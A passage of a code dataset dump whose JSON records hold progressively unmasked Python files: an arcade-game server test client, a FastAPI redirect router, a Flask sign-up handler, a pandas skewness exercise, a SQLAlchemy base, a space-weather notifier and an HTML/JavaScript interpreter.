e.add_child(Node.u8_array('la', [16, 0, 0, 0]))\n e.add_child(Node.u8('ver', 5))\n lobby.add_child(Node.s32_array('friend', []))\n call.add_child(lobby)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/lobby/interval\")\n self.assert_path(resp, \"response/lobby/interval_p\")\n self.assert_path(resp, \"response/lobby/eid\")\n self.assert_path(resp, \"response/lobby/e/eid\")\n self.assert_path(resp, \"response/lobby/e/mid\")\n self.assert_path(resp, \"response/lobby/e/ng\")\n self.assert_path(resp, \"response/lobby/e/uid\")\n self.assert_path(resp, \"response/lobby/e/uattr\")\n self.assert_path(resp, \"response/lobby/e/pn\")\n self.assert_path(resp, \"response/lobby/e/mg\")\n self.assert_path(resp, \"response/lobby/e/mopt\")\n self.assert_path(resp, \"response/lobby/e/tid\")\n self.assert_path(resp, \"response/lobby/e/tn\")\n self.assert_path(resp, \"response/lobby/e/topt\")\n self.assert_path(resp, \"response/lobby/e/lid\")\n self.assert_path(resp, \"response/lobby/e/sn\")\n self.assert_path(resp, \"response/lobby/e/pref\")\n self.assert_path(resp, \"response/lobby/e/stg\")\n self.assert_path(resp, \"response/lobby/e/pside\")\n self.assert_path(resp, \"response/lobby/e/eatime\")\n self.assert_path(resp, \"response/lobby/e/ga\")\n self.assert_path(resp, \"response/lobby/e/gp\")\n self.assert_path(resp, \"response/lobby/e/la\")\n self.assert_path(resp, \"response/lobby/e/ver\")\n return resp.child_value('lobby/eid')\n\n def verify_lobby_delete(self, eid: int) -> None:\n call = self.call_node()\n\n lobby = Node.void('lobby')\n lobby.set_attribute('method', 'delete')\n lobby.add_child(Node.s32('eid', eid))\n call.add_child(lobby)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/lobby\")\n\n def verify_pzlcmt_read(self, extid: int) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n 
info.set_attribute('method', 'pzlcmt_read')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.s32('time', 0))\n info.add_child(Node.s32('limit', 30))\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info/comment/time\")\n self.assert_path(resp, \"response/info/c/uid\")\n self.assert_path(resp, \"response/info/c/name\")\n self.assert_path(resp, \"response/info/c/icon\")\n self.assert_path(resp, \"response/info/c/bln\")\n self.assert_path(resp, \"response/info/c/tid\")\n self.assert_path(resp, \"response/info/c/t_name\")\n self.assert_path(resp, \"response/info/c/pref\")\n self.assert_path(resp, \"response/info/c/time\")\n self.assert_path(resp, \"response/info/c/comment\")\n self.assert_path(resp, \"response/info/c/is_tweet\")\n\n # Verify we posted our comment earlier\n found = False\n for child in resp.child('info').children:\n if child.name != 'c':\n continue\n if child.child_value('uid') == extid:\n name = child.child_value('name')\n comment = child.child_value('comment')\n if name != self.NAME:\n raise Exception('Invalid name \\'{}\\' returned for comment!'.format(name))\n if comment != 'アメ〜〜!':\n raise Exception('Invalid comment \\'{}\\' returned for comment!'.format(comment))\n found = True\n\n if not found:\n raise Exception('Comment we posted was not found!')\n\n def verify_pzlcmt_write(self, extid: int) -> None:\n call = self.call_node()\n\n info = Node.void('info')\n info.set_attribute('method', 'pzlcmt_write')\n info.add_child(Node.s32('uid', extid))\n info.add_child(Node.string('name', self.NAME))\n info.add_child(Node.s16('icon', 0))\n info.add_child(Node.s8('bln', 0))\n info.add_child(Node.s32('tid', 0))\n info.add_child(Node.string('t_name', ''))\n info.add_child(Node.s8('pref', 51))\n info.add_child(Node.s32('time', int(time.time())))\n info.add_child(Node.string('comment', 'アメ〜〜!'))\n 
info.add_child(Node.bool('is_tweet', True))\n call.add_child(info)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/info\")\n\n def verify_jbrbcollabo_save(self, refid: str) -> None:\n call = self.call_node()\n\n jbrbcollabo = Node.void('jbrbcollabo')\n jbrbcollabo.set_attribute('method', 'save')\n jbrbcollabo.add_child(Node.string('ref_id', refid))\n jbrbcollabo.add_child(Node.u16('cre_count', 0))\n call.add_child(jbrbcollabo)\n\n # Swap with server\n resp = self.exchange('', call)\n\n # Verify that response is correct\n self.assert_path(resp, \"response/jbrbcollabo\")\n\n def verify(self, cardid: Optional[str]) -> None:\n # Verify boot sequence is okay\n self.verify_services_get(\n expected_services=[\n 'pcbtracker',\n 'pcbevent',\n 'local',\n 'message',\n 'facility',\n 'cardmng',\n 'package',\n 'posevent',\n 'pkglist',\n 'dlstatus',\n 'eacoin',\n 'lobby',\n 'ntp',\n 'keepalive'\n ]\n )\n paseli_enabled = self.verify_pcbtracker_alive()\n self.verify_message_get()\n self.verify_package_list()\n location = self.verify_facility_get()\n self.verify_pcbevent_put()\n self.verify_pcb_boot(location)\n self.verify_info_common()\n\n # Verify card registration and profile lookup\n if cardid is not None:\n card = cardid\n else:\n card = self.random_card()\n print(\"Generated random card ID {} for use.\".format(card))\n\n if cardid is None:\n self.verify_cardmng_inquire(card, msg_type='unregistered', paseli_enabled=paseli_enabled)\n ref_id = self.verify_cardmng_getrefid(card)\n if len(ref_id) != 16:\n raise Exception('Invalid refid \\'{}\\' returned when registering card'.format(ref_id))\n if ref_id != self.verify_cardmng_inquire(card, msg_type='new', paseli_enabled=paseli_enabled):\n raise Exception('Invalid refid \\'{}\\' returned when querying card'.format(ref_id))\n # Always get a player start, regardless of new profile or not\n self.verify_player_start(ref_id)\n 
self.verify_player_delete(ref_id)\n self.verify_player_succeed(ref_id)\n extid = self.verify_player_write(\n ref_id,\n location,\n [{\n 'id': 0,\n 'chart': 0,\n 'clear_type': -1,\n 'achievement_rate': 0,\n 'score': 0,\n 'combo': 0,\n 'miss_count': 0,\n }]\n )\n else:\n print(\"Skipping new card checks for existing card\")\n ref_id = self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled)\n\n # Verify pin handling and return card handling\n self.verify_cardmng_authpass(ref_id, correct=True)\n self.verify_cardmng_authpass(ref_id, correct=False)\n if ref_id != self.verify_cardmng_inquire(card, msg_type='query', paseli_enabled=paseli_enabled):\n raise Exception('Invalid refid \\'{}\\' returned when querying card'.format(ref_id))\n\n # Verify lobby functionality\n self.verify_lobby_read(location, extid)\n eid = self.verify_lobby_entry(location, extid)\n self.verify_lobby_delete(eid)\n\n # Verify puzzle comment read and write\n self.verify_pzlcmt_write(extid)\n self.verify_pzlcmt_read(extid)\n\n # Verify Jubeat/ReflecBeat collabo save\n self.verify_jbrbcollabo_save(ref_id)\n\n if cardid is None:\n # Verify score saving and updating\n for phase in [1, 2]:\n if phase == 1:\n dummyscores = [\n # An okay score on a chart\n {\n 'id': 1,\n 'chart': 1,\n 'clear_type': 2,\n 'achievement_rate': 7543,\n 'score': 432,\n 'combo': 123,\n 'miss_count': 5,\n },\n # A good score on an easier chart of the same song\n {\n 'id': 1,\n 'chart': 0,\n 'clear_type': 4,\n 'achievement_rate': 9876,\n 'score': 543,\n 'combo': 543,\n 'miss_count': 0,\n },\n # A bad score on a hard chart\n {\n 'id': 3,\n 'chart': 2,\n 'clear_type': 2,\n 'achievement_rate': 1234,\n 'score': 123,\n 'combo': 42,\n 'miss_count': 54,\n },\n # A terrible score on an easy chart\n {\n 'id': 3,\n 'chart': 0,\n 'clear_type': 2,\n 'achievement_rate': 1024,\n 'score': 50,\n 'combo': 12,\n 'miss_count': 90,\n },\n ]\n if phase == 2:\n dummyscores = [\n # A better score on the same chart\n {\n 'id': 
1,\n 'chart': 1,\n 'clear_type': 3,\n 'achievement_rate': 8765,\n 'score': 469,\n 'combo': 468,\n 'miss_count': 1,\n },\n # A worse score on another same chart\n {\n 'id': 1,\n 'chart': 0,\n 'clear_type': 2,\n 'achievement_rate': 8765,\n 'score': 432,\n 'combo': 321,\n 'miss_count': 15,\n 'expected_score': 543,\n 'expected_clear_type': 4,\n 'expected_achievement_rate': 9876,\n 'expected_combo': 543,\n 'expected_miss_count': 0,\n },\n ]\n self.verify_player_write(ref_id, location, dummyscores)\n\n scores = self.verify_player_read(ref_id, location)\n for expected in dummyscores:\n actual = None\n for received in scores:\n if received['id'] == expected['id'] and received['chart'] == expected['chart']:\n actual = received\n break\n\n if actual is None:\n raise Exception(\"Didn't find song {} chart {} in response!\".format(expected['id'], expected['chart']))\n\n if 'expected_score' in expected:\n expected_score = expected['expected_score']\n else:\n expected_score = expected['score']\n if 'expected_achievement_rate' in expected:\n expected_achievement_rate = expected['expected_achievement_rate']\n else:\n expected_achievement_rate = expected['achievement_rate']\n if 'expected_clear_type' in expected:\n expected_clear_type = expected['expected_clear_type']\n else:\n expected_clear_type = expected['clear_type']\n if 'expected_combo' in expected:\n expected_combo = expected['expected_combo']\n else:\n expected_combo = expected['combo']\n if 'expected_miss_count' in expected:\n expected_miss_count = expected['expected_miss_count']\n else:\n expected_miss_count = expected['miss_count']\n\n if actual['score'] != expected_score:\n raise Exception('Expected a score of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got score \\'{}\\''.format(\n expected_score, expected['id'], expected['chart'], actual['score'],\n ))\n if actual['achievement_rate'] != expected_achievement_rate:\n raise Exception('Expected an achievement rate of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got 
achievement rate \\'{}\\''.format(\n expected_achievement_rate, expected['id'], expected['chart'], actual['achievement_rate'],\n ))\n if actual['clear_type'] != expected_clear_type:\n raise Exception('Expected a clear_type of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got clear_type \\'{}\\''.format(\n expected_clear_type, expected['id'], expected['chart'], actual['clear_type'],\n ))\n if actual['combo'] != expected_combo:\n raise Exception('Expected a combo of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got combo \\'{}\\''.format(\n expected_combo, expected['id'], expected['chart'], actual['combo'],\n ))\n if actual['miss_count'] != expected_miss_count:\n raise Exception('Expected a miss count of \\'{}\\' for song \\'{}\\' chart \\'{}\\' but got miss count \\'{}\\''.format(\n expected_miss_count, expected['id'], expected['chart'], actual['miss_count'],\n ))\n\n # Sleep so we don't end up putting in score history on the same second\n time.sleep(1)\n\n else:\n print(\"Skipping score checks for existing card\")\n\n # Verify ending game\n self.verify_player_end(ref_id)\n\n # Verify high score tables\n self.verify_info_ranking()\n\n # Verify paseli handling\n if paseli_enabled:\n print(\"PASELI enabled for this PCBID, executing PASELI checks\")\n else:\n print(\"PASELI disabled for this PCBID, skipping PASELI checks\")\n return\n\n sessid, balance = self.verify_eacoin_checkin(card)\n if balance == 0:\n print(\"Skipping PASELI consume check because card has 0 balance\")\n else:\n self.verify_eacoin_consume(sessid, balance, random.randint(0, balance))\n self.verify_eacoin_checkout(sessid)\n",
"step-ids": [
13,
14,
16,
18,
20
]
}
|
[
13,
14,
16,
18,
20
] |
# Short-link routes: redirect /go/... URLs to the matching Notion pages.
from fastapi import APIRouter, Depends
from fastapi.responses import RedirectResponse

import app.setting as setting
from app.dependencies import get_project_by_prefix
from app.entities.project import Project

# Every short link lives under the /go prefix.
router = APIRouter(prefix="/go")


@router.get("/{prefix_id}")
def redirect_to_board(project: Project = Depends(get_project_by_prefix)):
    """Send the caller to the project's Notion board."""
    return RedirectResponse(url=project.notion_board_url)


@router.get("/{prefix_id}/{ticket_id}")
def redirect_to_ticket(ticket_id: str, project: Project = Depends(get_project_by_prefix)):
    """Send the caller to the Notion page of one ticket.

    The target URL is the Notion base URL plus the page id with its
    dashes stripped (Notion's canonical compact page-id form).
    """
    ticket = project.query_ticket(ticket_id=ticket_id)
    target = setting.notion_base_url + ticket.id.replace("-", "")
    return RedirectResponse(url=target)
|
normal
|
{
"blob_id": "49b295c3e323695779eb32181193ef88b678b34d",
"index": 6340,
"step-1": "<mask token>\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected]('/{prefix_id}/{ticket_id}')\ndef redirect_to_ticket(ticket_id: str, project: Project=Depends(\n get_project_by_prefix)):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace('-', '')\n return RedirectResponse(url=notion_url)\n",
"step-3": "<mask token>\nrouter = APIRouter(prefix='/go')\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected]('/{prefix_id}/{ticket_id}')\ndef redirect_to_ticket(ticket_id: str, project: Project=Depends(\n get_project_by_prefix)):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace('-', '')\n return RedirectResponse(url=notion_url)\n",
"step-4": "from fastapi import APIRouter, Depends\nfrom fastapi.responses import RedirectResponse\nimport app.setting as setting\nfrom app.dependencies import get_project_by_prefix\nfrom app.entities.project import Project\nrouter = APIRouter(prefix='/go')\n\n\[email protected]('/{prefix_id}')\ndef redirect_to_board(project: Project=Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected]('/{prefix_id}/{ticket_id}')\ndef redirect_to_ticket(ticket_id: str, project: Project=Depends(\n get_project_by_prefix)):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace('-', '')\n return RedirectResponse(url=notion_url)\n",
"step-5": "from fastapi import APIRouter, Depends\nfrom fastapi.responses import RedirectResponse\n\nimport app.setting as setting\nfrom app.dependencies import get_project_by_prefix\nfrom app.entities.project import Project\n\n\nrouter = APIRouter(\n prefix=\"/go\",\n)\n\n\[email protected](\"/{prefix_id}\")\ndef redirect_to_board(project: Project = Depends(get_project_by_prefix)):\n return RedirectResponse(url=project.notion_board_url)\n\n\[email protected](\"/{prefix_id}/{ticket_id}\")\ndef redirect_to_ticket(\n ticket_id: str, project: Project = Depends(get_project_by_prefix)\n):\n ticket = project.query_ticket(ticket_id=ticket_id)\n notion_url = setting.notion_base_url + ticket.id.replace(\"-\", \"\")\n return RedirectResponse(url=notion_url)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import constants
from auth.storage import Storage
from utils import create_error_with_status
from flask import jsonify, request, current_app


def register_user():
    """Register a new user from the JSON request body.

    Expects a body of the form ``{"email": ..., "password": ...}`` and
    returns a ``(json_body, http_status)`` pair suitable as a Flask view
    result: the created email on success, or a structured error when the
    payload is incomplete or the email is already taken.
    """
    try:
        email = request.json["email"]
        password = request.json["password"]
    # TypeError covers a missing / non-JSON body (request.json is None);
    # KeyError covers a JSON body that lacks one of the fields.
    except (KeyError, TypeError):
        status = constants.statuses["user"]["missingData"]
        body = create_error_with_status(status, "missing user data")
        # .warning: .warn is a deprecated alias in the logging module.
        current_app.logger.warning("Not enough data for sign-up")
        return jsonify(body), constants.responses[status]

    current_app.logger.info(f"Sign up for {email}")

    status = Storage.add_user(email, password)
    http_status = constants.responses[status]

    if status == constants.statuses["user"]["created"]:
        body = dict(status=status, email=email)
    else:  # status == constants.statuses["user"]["emailUsed"]
        # Single braces so the template can actually interpolate the address;
        # the previous "{{email}}" is str.format brace-escaping and would
        # render the literal text "{email}" instead of the value.
        body = create_error_with_status(status, "email {email} is already registered", email=email)
    return jsonify(body), http_status
|
normal
|
{
"blob_id": "73a4b3497952f90029ba24b73b835de53fc687ec",
"index": 3349,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef register_user():\n try:\n email = request.json['email']\n password = request.json['password']\n except KeyError:\n status = constants.statuses['user']['missingData']\n body = create_error_with_status(status, 'missing user data')\n current_app.logger.warn('Not enough data for sing-up')\n return jsonify(body), constants.responses[status]\n current_app.logger.info(f'Sing up for {email}')\n status = Storage.add_user(email, password)\n http_status = constants.responses[status]\n if status == constants.statuses['user']['created']:\n body = dict(status=status, email=email)\n else:\n body = create_error_with_status(status,\n 'email {{email}} is already registered', email=email)\n return jsonify(body), http_status\n",
"step-3": "import constants\nfrom auth.storage import Storage\nfrom utils import create_error_with_status\nfrom flask import jsonify, request, current_app\n\n\ndef register_user():\n try:\n email = request.json['email']\n password = request.json['password']\n except KeyError:\n status = constants.statuses['user']['missingData']\n body = create_error_with_status(status, 'missing user data')\n current_app.logger.warn('Not enough data for sing-up')\n return jsonify(body), constants.responses[status]\n current_app.logger.info(f'Sing up for {email}')\n status = Storage.add_user(email, password)\n http_status = constants.responses[status]\n if status == constants.statuses['user']['created']:\n body = dict(status=status, email=email)\n else:\n body = create_error_with_status(status,\n 'email {{email}} is already registered', email=email)\n return jsonify(body), http_status\n",
"step-4": "import constants\nfrom auth.storage import Storage\n\nfrom utils import create_error_with_status\n\nfrom flask import jsonify, request, current_app\n\n\ndef register_user():\n try:\n email = request.json[\"email\"]\n password = request.json[\"password\"]\n except KeyError:\n status = constants.statuses[\"user\"][\"missingData\"]\n body = create_error_with_status(status, \"missing user data\")\n current_app.logger.warn(\"Not enough data for sing-up\")\n return jsonify(body), constants.responses[status]\n\n current_app.logger.info(f\"Sing up for {email}\")\n\n status = Storage.add_user(email, password)\n http_status = constants.responses[status]\n\n if status == constants.statuses[\"user\"][\"created\"]:\n body = dict(status=status, email=email)\n else: # status == constants.statuses[\"user\"][\"emailUsed\"]:\n body = create_error_with_status(status, \"email {{email}} is already registered\", email=email)\n return jsonify(body), http_status\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# %load q03_skewness_log/build.py
from scipy.stats import skew
import pandas as pd
import numpy as np
# Training data loaded at import time for the exercise harness; the solution
# below reads its 'SalePrice' and 'GrLivArea' columns.
data = pd.read_csv('data/train.csv')
# Write code here:
def skewness_log(df):
df['SalePrice_New'] = np.log(df['SalePrice'])
df['GrLivArea_New'] = np.log(df['GrLivArea'])
skewed_slPri = skew(df['SalePrice_New'])
skewness_grLiv = skew(df['GrLivArea_New'])
return skewness_grLiv,skewed_slPri
|
normal
|
{
"blob_id": "f5bd41f4aaff616a332d80ec44c364ffc91c58f0",
"index": 265,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv, skewed_slPri\n",
"step-3": "<mask token>\ndata = pd.read_csv('data/train.csv')\n\n\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv, skewed_slPri\n",
"step-4": "from scipy.stats import skew\nimport pandas as pd\nimport numpy as np\ndata = pd.read_csv('data/train.csv')\n\n\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv, skewed_slPri\n",
"step-5": "# %load q03_skewness_log/build.py\nfrom scipy.stats import skew\nimport pandas as pd\nimport numpy as np\n\ndata = pd.read_csv('data/train.csv')\n\n\n# Write code here:\ndef skewness_log(df):\n df['SalePrice_New'] = np.log(df['SalePrice'])\n df['GrLivArea_New'] = np.log(df['GrLivArea'])\n skewed_slPri = skew(df['SalePrice_New'])\n skewness_grLiv = skew(df['GrLivArea_New'])\n return skewness_grLiv,skewed_slPri\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String, ForeignKey, Float
from sqlalchemy.orm import relationship, backref
ORMBase = declarative_base()
def create_all(engine):
ORMBase.metadata.create_all(engine)
|
normal
|
{
"blob_id": "c7ca8235864ce5de188c4aa2feb9ad82d4fa9b0f",
"index": 4023,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef create_all(engine):\n ORMBase.metadata.create_all(engine)\n",
"step-3": "<mask token>\nORMBase = declarative_base()\n\n\ndef create_all(engine):\n ORMBase.metadata.create_all(engine)\n",
"step-4": "from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, ForeignKey, Float\nfrom sqlalchemy.orm import relationship, backref\nORMBase = declarative_base()\n\n\ndef create_all(engine):\n ORMBase.metadata.create_all(engine)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import calendar
import json
from datetime import datetime
from datapoller.download import download
from datapoller.settings import *
from messaging.Messaging import sendMessage
from messaging.settings import RABBIT_NOTIFY_QUEUE
from sessioncontroller.utils import is_level_interesting_for_kp
__author__ = 'arik'
sharedDict = {}
def registerModelStorage(dict):
global sharedDict
sharedDict = dict
def updateModel():
(lastLevels, validTime) = download(NOWCAST_DATA_URL)
sharedDict['lastLevels'] = lastLevels
sharedDict['validTime'] = validTime
def hasValidModel():
lastLevels = sharedDict.get('lastLevels')
validTime = sharedDict.get('validTime')
return lastLevels is not None and validTime is not None and \
getTimestamp(validTime) >= getTimestamp(datetime.utcnow())
def processUserLocation(geo_id, geo, kp_level, chat_id, bot):
if hasValidModel() is False:
return
lastLevels = sharedDict.get('lastLevels')
validTime = sharedDict.get('validTime')
level = lastLevels[geo_id]
if kp_level is None or is_level_interesting_for_kp(level, kp_level):
sendMessage(
RABBIT_NOTIFY_QUEUE,
json.dumps({"time": getTimestamp(validTime), "geo": geo, "chat_id": chat_id, "level": level, "bot": bot})
)
def getTimestamp(datetime):
return calendar.timegm(datetime.timetuple())
|
normal
|
{
"blob_id": "e8f090a02bfd5ee8a6832351357594af2d6692f9",
"index": 8702,
"step-1": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-2": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\n<mask token>\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-3": "<mask token>\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-4": "<mask token>\n__author__ = 'arik'\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\n\ndef updateModel():\n lastLevels, validTime = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and getTimestamp(\n validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(RABBIT_NOTIFY_QUEUE, json.dumps({'time': getTimestamp(\n validTime), 'geo': geo, 'chat_id': chat_id, 'level': level,\n 'bot': bot}))\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-5": "import calendar\nimport json\nfrom datetime import datetime\nfrom datapoller.download import download\nfrom datapoller.settings import *\nfrom messaging.Messaging import sendMessage\nfrom messaging.settings import RABBIT_NOTIFY_QUEUE\nfrom sessioncontroller.utils import is_level_interesting_for_kp\n\n__author__ = 'arik'\n\nsharedDict = {}\n\n\ndef registerModelStorage(dict):\n global sharedDict\n sharedDict = dict\n\ndef updateModel():\n (lastLevels, validTime) = download(NOWCAST_DATA_URL)\n sharedDict['lastLevels'] = lastLevels\n sharedDict['validTime'] = validTime\n\n\ndef hasValidModel():\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n return lastLevels is not None and validTime is not None and \\\n getTimestamp(validTime) >= getTimestamp(datetime.utcnow())\n\n\ndef processUserLocation(geo_id, geo, kp_level, chat_id, bot):\n if hasValidModel() is False:\n return\n lastLevels = sharedDict.get('lastLevels')\n validTime = sharedDict.get('validTime')\n level = lastLevels[geo_id]\n if kp_level is None or is_level_interesting_for_kp(level, kp_level):\n sendMessage(\n RABBIT_NOTIFY_QUEUE,\n json.dumps({\"time\": getTimestamp(validTime), \"geo\": geo, \"chat_id\": chat_id, \"level\": level, \"bot\": bot})\n )\n\n\ndef getTimestamp(datetime):\n return calendar.timegm(datetime.timetuple())\n",
"step-ids": [
3,
4,
5,
6,
8
]
}
|
[
3,
4,
5,
6,
8
] |
import graphics
import ply.lex as lex
import ply.yacc as yacc
import jstokens
import jsgrammar
def interpret(trees): # Hello, friend
for tree in trees: # Hello,
# ("word-element","Hello")
nodetype=tree[0] # "word-element"
if nodetype == "word-element":
graphics.word(tree[1])
elif nodetype == "tag-element":
# <b>Strong text</b>
tagname = tree[1] # b
tagargs = tree[2] # []
subtrees = tree[3] # ...Strong Text!...
closetagname = tree[4] # b
if(tagname!=closetagname):
graphics.warning("mismatched tag")
else:
graphics.begintag(tagname,tagargs)
interpret(subtrees)
graphics.endtag()
elif nodetype == "javascript-element":
jstext = tree[1]; # "document.write(55);"
jslexer = lex.lex(module=jstokens)
jsparser = yacc.yacc(module=jsgrammar)
jstree = jsparser.parse(jstext,lexer=jslexer)
# jstree is a parse tree for JavaScript
result = jsinterp.interpret(jstree)
graphics.word(result)
|
normal
|
{
"blob_id": "f3b3bee494493263f8b00827e6f3ff3a1dcd8c37",
"index": 6144,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef interpret(trees):\n for tree in trees:\n nodetype = tree[0]\n if nodetype == 'word-element':\n graphics.word(tree[1])\n elif nodetype == 'tag-element':\n tagname = tree[1]\n tagargs = tree[2]\n subtrees = tree[3]\n closetagname = tree[4]\n if tagname != closetagname:\n graphics.warning('mismatched tag')\n else:\n graphics.begintag(tagname, tagargs)\n interpret(subtrees)\n graphics.endtag()\n elif nodetype == 'javascript-element':\n jstext = tree[1]\n jslexer = lex.lex(module=jstokens)\n jsparser = yacc.yacc(module=jsgrammar)\n jstree = jsparser.parse(jstext, lexer=jslexer)\n result = jsinterp.interpret(jstree)\n graphics.word(result)\n",
"step-3": "import graphics\nimport ply.lex as lex\nimport ply.yacc as yacc\nimport jstokens\nimport jsgrammar\n\n\ndef interpret(trees):\n for tree in trees:\n nodetype = tree[0]\n if nodetype == 'word-element':\n graphics.word(tree[1])\n elif nodetype == 'tag-element':\n tagname = tree[1]\n tagargs = tree[2]\n subtrees = tree[3]\n closetagname = tree[4]\n if tagname != closetagname:\n graphics.warning('mismatched tag')\n else:\n graphics.begintag(tagname, tagargs)\n interpret(subtrees)\n graphics.endtag()\n elif nodetype == 'javascript-element':\n jstext = tree[1]\n jslexer = lex.lex(module=jstokens)\n jsparser = yacc.yacc(module=jsgrammar)\n jstree = jsparser.parse(jstext, lexer=jslexer)\n result = jsinterp.interpret(jstree)\n graphics.word(result)\n",
